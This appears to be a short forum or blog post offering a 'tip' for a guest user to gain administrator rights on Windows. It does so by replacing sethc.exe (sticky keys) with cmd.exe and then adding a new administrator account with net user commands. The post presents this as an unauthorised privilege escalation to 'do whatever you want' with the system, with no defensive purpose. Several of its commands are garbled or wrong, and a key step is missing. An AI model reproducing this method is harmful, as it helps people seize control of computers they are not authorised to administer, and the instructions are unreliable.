Hi! Friends
Today , I would like to share a valuable tip to gain admin rights in guest mode.
So, here we go:
- First of all go to Windows/system32 folder find the file named cmd.exe. Once found copy the file and past in another location like d: drive or d:/myfolder/.
- Now rename the file cmd.exe to sethc.exe by typing the following command.
Open Command prompt by typing cmd on run dialog box(To open run box, click Start->>Run)
Type cmd in the box and press Enter
3. Now type following on the command prompt:
Your Drive letter:/ ren cmd.exe sethc.exe
eg: D:/ren ren cmd.exe sethc.exe
(We assume that the sethc.exe file is in D: drive)
4. Now copy the renamed file sethc.exe to the Windows/system32 folder, you will get message
something saying the file already exists. Do you want to replace the existing file. Click Yes button.
Now the magic begins:
Type the following on the command prompt
- net user username /add
- net user localgroup administrators username /add
- And a new user called username with admin privilege will be added.
{Replace user name with any name you wish to use}
And thats it, you have admin privilege of the system and you can do what ever you want to with it.
Now login with new user name.
Enjoy!
Don't forget to send me your feedback.
